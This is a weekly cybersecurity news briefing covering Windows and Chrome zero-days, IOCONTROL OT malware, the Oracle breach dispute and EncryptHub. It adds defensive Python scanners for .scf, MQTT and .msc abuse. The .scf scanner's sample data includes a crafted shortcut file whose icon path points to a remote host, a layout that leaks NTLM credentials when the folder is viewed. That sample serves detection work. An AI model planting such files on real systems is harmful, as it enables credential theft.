Cyber Security Weekly Briefing, 22-28 March

March 28, 2025

New 0-day vulnerability in Windows exposes NTLM credentials

A new 0-day vulnerability in Windows, discovered by 0patch and detailed in their blog, allows attackers to steal NTLM credentials by tricking users into viewing malicious .scf files in Windows Explorer. This flaw affects everything from Windows 7 and Server 2008 R2 to the most recent versions, such as Windows 11 v24H2 and Server 2025, and does not yet have a CVE identifier.

Although Microsoft has not issued an official patch, 0patch has developed free micropatches that are applied automatically and without a reboot, even on systems that are no longer supported. This vulnerability adds to other recent NTLM-related flaws that Microsoft has classified as “won't fix”: vulnerabilities it has decided not to correct, whether because of their low impact, their complexity, or because they affect unsupported versions.

Users are therefore advised to consider third-party solutions such as 0patch to protect their systems, especially if they run unsupported versions, or to disable the vulnerable functionality where possible.
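One practical check a defender can run on file shares while waiting for a vendor fix is to look for .scf files whose icon is fetched from a remote host. The following scanner is an added example, not code from the briefing or from 0patch, and the briefing does not describe the exact trigger 0patch found; the scanner assumes the long-known .scf behaviour that Explorer resolves each file's IconFile entry as soon as the folder is displayed, so a UNC or URL target makes the viewing machine authenticate outbound. The sample files and the 203.0.113.9 address are constructed.

```python
"""Flag .scf (Shell Command File) entries whose icon is fetched from a remote host.

Added example, not from the briefing or from 0patch. Assumption: Explorer reads the
IconFile entry of every .scf file in a folder as soon as the folder is displayed,
so a UNC or URL target makes the viewing machine authenticate outbound. The sample
files and the 203.0.113.9 address below are constructed.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional

UNC_RE = re.compile(r"^\\\\[^\\]+\\")          # \\host\share\...
FWD_UNC_RE = re.compile(r"^//[^/]+/")           # //host/share/... is also resolved by Explorer
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    path: str
    icon_file: str
    reason: str


def parse_scf(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [Shell] section, keys lower-cased."""
    section: Optional[str] = None
    shell: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "shell" and "=" in line:
            key, _, value = line.partition("=")
            shell[key.strip().lower()] = value.strip()
    return shell


def classify_icon_target(icon_file: str) -> Optional[str]:
    """Reason string if the icon would be fetched from a remote host, else None."""
    target = icon_file.strip().strip('"')
    if UNC_RE.match(target) or FWD_UNC_RE.match(target):
        return "icon fetched over SMB/WebDAV from a remote host; viewing the folder authenticates outbound"
    if URL_RE.match(target):
        return "icon fetched from a URL"
    return None


def scan_tree(root: str) -> List[Finding]:
    """Walk a share and report every .scf file whose IconFile is remote."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace", newline="") as fh:
                    shell = parse_scf(fh.read())
            except OSError:
                continue
            reason = classify_icon_target(shell.get("iconfile", ""))
            if reason:
                findings.append(Finding(path, shell["iconfile"], reason))
    return sorted(findings, key=lambda f: f.path)


# Constructed sample share: one ordinary .scf, one with a remote icon, one non-.scf decoy.
SAMPLE_FILES = {
    "ShowDesktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "Quarterly.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.9\\share\\q.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "readme.txt": "IconFile=\\\\203.0.113.9\\share\\q.ico\r\n",
}


def demo() -> List[Finding]:
    """Write the samples to a temp dir, scan it, and return findings with relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8", newline="") as fh:
                fh.write(body)
        return [Finding(os.path.relpath(f.path, tmp), f.icon_file, f.reason) for f in scan_tree(tmp)]


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: IconFile={f.icon_file!r} -> {f.reason}")
```

Pointing `scan_tree` at a mounted share gives a list of files to quarantine; the parser deliberately ignores anything outside the `[Shell]` section, since only `IconFile` drives the icon fetch.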


IOCONTROL: New malware targeting critical infrastructures

Flashpoint researchers have identified a new malware family attributed to the pro-Iranian hacktivist group Cyber Av3ngers. IOCONTROL, designed to attack IoT and OT systems, has been detected in attacks against fuel management infrastructure in the US and Israel. The malware uses advanced techniques to evade analysis, including packing with a modified UPX and AES-256 encryption to hide its C2 domain.

Once deployed, it establishes persistence on the system, collects information and maintains communication with its control server over the MQTT protocol. Flashpoint researchers have also identified an alleged developer offering IOCONTROL on underground forums, which could encourage its proliferation in future attacks. Given its sophistication, organizations are advised to strengthen security measures in industrial environments.
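Because IOCONTROL talks to its controller over MQTT, a protocol many OT sites already use for telemetry, the practical defensive move is to know which hosts legitimately speak MQTT and to which broker. The following decoder is an added example, not from Flashpoint's report and not IOCONTROL code: it parses MQTT 3.1.1 CONNECT packets and flags sessions from hosts that are not expected to speak MQTT or that connect to an unsanctioned broker. It assumes the defender has the first client payload of each TCP session to the broker port from a capture; the allowlists, IP addresses and sample sessions are all constructed.

```python
"""Decode MQTT 3.1.1 CONNECT packets so MQTT use on an OT network can be inventoried.

Added example, not from Flashpoint's report and not IOCONTROL code. It assumes the
defender has the first client payload of each TCP session to the broker port from a
capture. Allowlists, IP addresses and the sample sessions are all constructed.
"""
import struct
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass
class MqttConnect:
    client_id: str
    keep_alive: int
    username: Optional[str]
    has_password: bool
    will_topic: Optional[str]


def _read_varint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Variable-byte integer: 7 data bits per byte, 0x80 means another byte follows."""
    value, shift = 0, 0
    for _ in range(4):
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
    raise ValueError("malformed variable-byte integer")


def _read_field(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Length-prefixed (big-endian u16) string or binary field."""
    (n,) = struct.unpack_from(">H", buf, pos)
    if pos + 2 + n > len(buf):
        raise ValueError("truncated field")
    return buf[pos + 2:pos + 2 + n], pos + 2 + n


def parse_connect(packet: bytes) -> MqttConnect:
    if len(packet) < 2 or (packet[0] >> 4) != 1:
        raise ValueError("not an MQTT CONNECT packet")
    remaining, pos = _read_varint(packet, 1)
    if pos + remaining > len(packet):
        raise ValueError("truncated packet")
    name, pos = _read_field(packet, pos)
    level, flags = packet[pos], packet[pos + 1]
    if name != b"MQTT" or level != 4:          # MQTT 5 adds a properties block; not handled here
        raise ValueError(f"unsupported protocol {name!r} level {level}")
    (keep_alive,) = struct.unpack_from(">H", packet, pos + 2)
    pos += 4
    client_id, pos = _read_field(packet, pos)
    will_topic = None
    if flags & 0x04:                           # Will flag: topic and payload follow the client id
        raw_topic, pos = _read_field(packet, pos)
        will_topic = raw_topic.decode("utf-8")
        _, pos = _read_field(packet, pos)      # will payload, not needed here
    username = None
    if flags & 0x80:
        raw_user, pos = _read_field(packet, pos)
        username = raw_user.decode("utf-8")
    if flags & 0x40:
        _, pos = _read_field(packet, pos)      # password is consumed, never stored
    return MqttConnect(client_id.decode("utf-8"), keep_alive, username, bool(flags & 0x40), will_topic)


SANCTIONED_BROKERS = {"10.10.0.5"}      # constructed: the site's own broker
EXPECTED_MQTT_CLIENTS = {"10.10.1.20"}  # constructed: hosts known to publish telemetry


def audit_sessions(sessions: Iterable[Tuple[str, str, bytes]],
                   brokers=SANCTIONED_BROKERS, clients=EXPECTED_MQTT_CLIENTS) -> List[Tuple[str, str, str]]:
    """Each session is (src_ip, dst_ip, first_client_payload); returns (src, client_id, reason) alerts."""
    alerts = []
    for src, dst, payload in sessions:
        try:
            conn = parse_connect(payload)
        except (ValueError, IndexError, struct.error, UnicodeDecodeError):
            continue                            # not MQTT, or malformed: out of scope here
        if dst not in brokers:
            alerts.append((src, conn.client_id, f"CONNECT to unsanctioned broker {dst}"))
        if src not in clients:
            alerts.append((src, conn.client_id, "host not expected to speak MQTT"))
    return alerts


# Constructed sample traffic: MQTT 3.1.1 CONNECT packets assembled by hand.
def _mqtt_str(s: str) -> bytes:
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def _encode_varint(n: int) -> bytes:
    out = bytearray()
    while True:
        n, b = divmod(n, 128)
        out.append((b | 0x80) if n else b)
        if not n:
            return bytes(out)


def build_connect(client_id, keep_alive=60, username=None, password=None, will=None) -> bytes:
    flags, body = 0x02, _mqtt_str(client_id)   # clean session; payload order per spec
    if will:
        flags |= 0x04
        body += _mqtt_str(will[0]) + _mqtt_str(will[1])
    if username is not None:
        flags |= 0x80
        body += _mqtt_str(username)
    if password is not None:
        flags |= 0x40
        body += _mqtt_str(password)
    var_header = _mqtt_str("MQTT") + bytes([4, flags]) + struct.pack(">H", keep_alive)
    return b"\x10" + _encode_varint(len(var_header) + len(body)) + var_header + body


SAMPLE_SESSIONS = [
    ("10.10.1.20", "10.10.0.5", build_connect("sensor-01", username="iot", password="x")),
    ("10.10.1.77", "198.51.100.4", build_connect("pumpctl-7", keep_alive=30, will=("status", "offline"))),
]
```

Feeding `audit_sessions` with the first client payload of every session on the broker port (for example, extracted from a capture with a packet library) yields an inventory of client IDs per host; anything outside the baseline, especially a CONNECT to an external address, is worth a closer look.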


Alleged data breach: CloudSEK responds with new evidence following Oracle statements

CloudSEK and Oracle are currently embroiled in a dispute over an alleged breach of Oracle's cloud infrastructure. CloudSEK initially reported that a malicious actor known as "rose87168" claimed to have compromised an Oracle single sign-on (SSO) endpoint and gained access to 6 million records, including SSO and LDAP credentials, OAuth2 keys and customer information.

Oracle responded by categorically denying any breach, stating that the disclosed credentials were not associated with Oracle Cloud and that no customers were affected. CloudSEK, however, presented additional evidence that it says confirms the intrusion and underlines the need for transparency and collaboration in cybersecurity. Its researchers traced the attacker's activity to a compromised production endpoint (login.us2.oraclecloud.com) used to authenticate API requests with OAuth2 tokens.

In addition, CloudSEK verified that several domains provided by the attacker corresponded to real Oracle Cloud customers.


Fixed an actively exploited 0-day flaw in Chrome

Google has fixed a high-severity 0-day flaw in Chrome that has been actively exploited by malicious actors in espionage attacks. The fix shipped to Stable Desktop channel users, with patched builds (134.0.6998.178) distributed to Windows users worldwide. Separately, Kaspersky researchers described the vulnerability as an incorrect handle being provided in unspecified circumstances in Mojo on Windows.

The flaw is being used in phishing attacks as part of a cyber-espionage campaign, dubbed Operation ForumTroll, that targets Russian organizations, specifically the country's media outlets, educational institutions and government bodies. The attackers exploit CVE-2025-2783 to bypass Chrome's sandbox protections and infect targets with sophisticated malware; a second exploit, which allowed remote code execution on compromised systems, was also used.

Patching Chrome, however, breaks the entire exploit chain and blocks these attacks.


EncryptHub leverages CVE-2025-26633 in its attacks

A Trend Micro report reveals that the threat actor EncryptHub, also known as Larva-208 or Water Gamayun, has been exploiting CVE-2025-26633 (CVSSv3 score 7.0 per Microsoft), a 0-day vulnerability that bypasses a security feature in the Microsoft Management Console, in its attacks.

EncryptHub's technique, which Trend Micro has dubbed MSC EvilTwin, manipulates .msc files and the Multilingual User Interface path (MUIPath) to download and execute malicious payloads; on unpatched devices the user is not warned before an unexpected MSC file is loaded. In these attacks EncryptHub used several malware families, including the SilentPrism backdoor and the Stealc and Rhadamanthys infostealers.
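Beyond applying the Microsoft patch, a defender can hunt for the file layout this kind of MUIPath abuse leaves on disk. The scanner below is an added example, not code from the briefing or from Trend Micro. The briefing only says that MSC EvilTwin manipulates .msc files and the MUIPath; the assumption coded here, taken from public analyses of the loader, is that the malicious copy sits in a language-tag directory (such as en-US) next to a clean console file of the same name, which is where an MUI lookup would find it. All sample files are constructed.

```python
"""Report .msc console files that have a same-named twin in a locale subfolder.

Added example, not from the briefing or from Trend Micro. Assumption: the malicious
.msc is placed in a language-tag directory (en-US, de-DE, ...) beside a clean .msc
of the same name, so an MUI lookup loads the twin. Sample files are constructed.
"""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List

# Windows language tags used for MUI lookups: en-US, de-DE, zh-Hans-CN, sr-Latn-RS ...
LOCALE_DIR_RE = re.compile(r"^[a-z]{2,3}(-[A-Z][a-z]{3})?-[A-Z]{2}$")


@dataclass(frozen=True)
class Twin:
    clean_path: str
    twin_path: str
    locale_dir: str
    identical: bool        # True when both files hash the same (a harmless duplicate)


def _sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_msc_twins(root: str) -> List[Twin]:
    """Walk a tree and pair each .msc with a same-named file in a locale subdirectory."""
    twins = []
    for dirpath, dirnames, filenames in os.walk(root):
        by_lower = {n.lower(): n for n in filenames if n.lower().endswith(".msc")}
        if not by_lower:
            continue
        for sub in dirnames:
            if not LOCALE_DIR_RE.match(sub):
                continue
            sub_dir = os.path.join(dirpath, sub)
            try:
                candidates = os.listdir(sub_dir)
            except OSError:
                continue
            for cand in candidates:
                original = by_lower.get(cand.lower())
                if original is None:
                    continue
                clean, twin = os.path.join(dirpath, original), os.path.join(sub_dir, cand)
                if os.path.isfile(twin):
                    twins.append(Twin(clean, twin, sub, _sha256(clean) == _sha256(twin)))
    return sorted(twins, key=lambda t: t.twin_path)


# Constructed sample tree: one real twin pair plus two layouts that must not match.
SAMPLE_TREE = {
    "Firewall.msc": "<MMC_ConsoleFile/>",                          # stand-in 'clean' console
    "en-US/Firewall.msc": "<MMC_ConsoleFile><!-- twin --></MMC_ConsoleFile>",
    "docs/Firewall.msc": "<MMC_ConsoleFile/>",                     # 'docs' is not a locale dir
    "en-US/Other.msc": "<MMC_ConsoleFile/>",                       # no same-named parent file
}


def demo() -> List[Twin]:
    """Materialize the sample tree in a temp dir and return twins with relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_TREE.items():
            full = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return [Twin(os.path.relpath(t.clean_path, tmp), os.path.relpath(t.twin_path, tmp),
                     t.locale_dir, t.identical) for t in find_msc_twins(tmp)]


if __name__ == "__main__":
    for t in demo():
        print(f"{t.clean_path} <-> {t.twin_path} ({t.locale_dir}, identical={t.identical})")
```

Run `find_msc_twins` over user-writable locations and download folders; a pair whose `identical` flag is false is the one to pull for analysis, since a legitimate console has no reason to carry a differing copy under a locale directory.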
